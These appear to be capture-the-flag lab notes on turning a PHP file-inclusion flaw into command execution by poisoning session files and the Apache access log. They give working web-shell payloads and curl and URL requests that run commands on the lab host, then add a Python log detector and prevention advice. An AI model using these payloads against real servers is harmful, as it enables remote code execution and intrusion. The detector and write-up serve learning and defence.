Log Poisoning
April 22, 2024


First way: include the PHP session file (the file name is sess_ followed by the PHPSESSID cookie value)

http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l

Send the PHP payload as the language value so that it gets written into the session file

http://94.237.62.149:55216/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

Then include the session file again with the cmd parameter set

http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l&cmd=id

http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l&cmd=pwd

Second way to do this

http://94.237.62.149:55216/index.php?language=/var/log/apache2/access.log

Change the User-Agent to "Apache Log Poisoning" and check whether that string shows up in the included log, so that we know we can poison it

Then we inject the PHP web shell that reads its command from the cmd GET parameter
Don't forget the surrounding single quotes
'<?php system($_GET['cmd']); ?>'

Then just add "&cmd=id" to the request so that we can see the id of the current user
/index.php?language=/var/log/apache2/access.log&cmd=id

Now that the log is poisoned we can run any other command the same way
/index.php?language=/var/log/apache2/access.log&cmd=ls

/index.php?language=/var/log/apache2/access.log&cmd=cd%20%2F%3B%20ls%20
# URL-encoded form of: cd /; ls

/index.php?language=/var/log/apache2/access.log&cmd=cat%20%2Fc85ee5082f4c723ace6c0796e3a3db09.txt
# URL-encoded form of: cat /c85ee5082f4c723ace6c0796e3a3db09.txt

Third way
We could also use this curl command to poison the Apache log (the -A flag sets the User-Agent)
curl -s "http://94.237.62.149:40752/index.php" -A "<?php system($_GET['cmd']); ?>"
Then we just send the same include request again from Burp Suite
/index.php?language=/var/log/apache2/access.log&cmd=id
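Seen from the defender's side, all three ways above leave the same traces in the Apache access log: a PHP open tag arriving in a header or in the query string, and an include parameter pointing at a log or session file (often followed by a cmd parameter). The following detector is an added example, not part of the original notes or the lab; it parses Apache combined-format lines and flags those patterns. The log lines, the IP 203.0.113.5 and the session id in them are constructed for the example, and the parameter name "language" is taken from the URLs above.

```python
"""Detect log/session poisoning attempts against an LFI-style include parameter.

Scans Apache combined-format access log lines for:
  1. a PHP open tag in the User-Agent or Referer header  (log poisoning)
  2. a PHP open tag in the request target                (session poisoning via GET)
  3. the include parameter pointing at a log/session file (executing poisoned content)
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log format, fields named for readability.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Matches "<?php" and the short echo tag "<?=", case-insensitively.
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)

INCLUDE_PARAM = 'language'  # the include parameter used by the page above
# Locations an attacker includes to execute content they wrote there.
SENSITIVE_PREFIXES = ('/var/log/', '/var/lib/php/sessions/', '/proc/self/')

# Constructed sample log, mirroring the three techniques in the notes.
SAMPLE_LOG = r"""
203.0.113.5 - - [22/Apr/2024:10:00:01 +0000] "GET /index.php?language=en HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Apr/2024:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 1234 "-" "<?php system($_GET['cmd']); ?>"
203.0.113.5 - - [22/Apr/2024:10:00:03 +0000] "GET /index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Apr/2024:10:00:04 +0000] "GET /index.php?language=/var/lib/php/sessions/sess_EXAMPLE0000000000000000000&cmd=id HTTP/1.1" 200 1300 "-" "Mozilla/5.0"
203.0.113.5 - - [22/Apr/2024:10:00:05 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=cd%20%2F%3B%20ls%20 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"
""".strip().splitlines()


def parse_line(line):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip('\n'))
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of findings for one parsed entry (empty list when benign)."""
    findings = []
    # 1. PHP code smuggled into a header that Apache writes into the log verbatim.
    if PHP_TAG_RE.search(entry['ua']) or PHP_TAG_RE.search(entry['referer']):
        findings.append('php_tag_in_header')
    # 2. PHP code in the request target (decode once, as the app would).
    if PHP_TAG_RE.search(unquote(entry['target'])):
        findings.append('php_tag_in_request')
    # 3. Include parameter aimed at a log/session file; parse_qs decodes the values.
    params = parse_qs(urlsplit(entry['target']).query, keep_blank_values=True)
    for value in params.get(INCLUDE_PARAM, []):
        if value.startswith(SENSITIVE_PREFIXES) or '../' in value:
            findings.append('include_of_log_or_session')
            if 'cmd' in params:
                findings.append('command_execution_attempt')
            break
    return findings


def scan(lines):
    """Return (ip, target, findings) for every line that triggers at least one finding."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append((entry['ip'], entry['target'], findings))
    return hits


if __name__ == '__main__':
    for ip, target, findings in scan(SAMPLE_LOG):
        print(f'{ip} {target} -> {", ".join(findings)}')
```

The same three signals are what to hunt for in real logs after an LFI is confirmed. On the prevention side, the include should never take a path from the request at all: map the language parameter to a fixed list of allowed file names and reject anything else, and keep session files and logs outside any directory the web server is allowed to include from.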
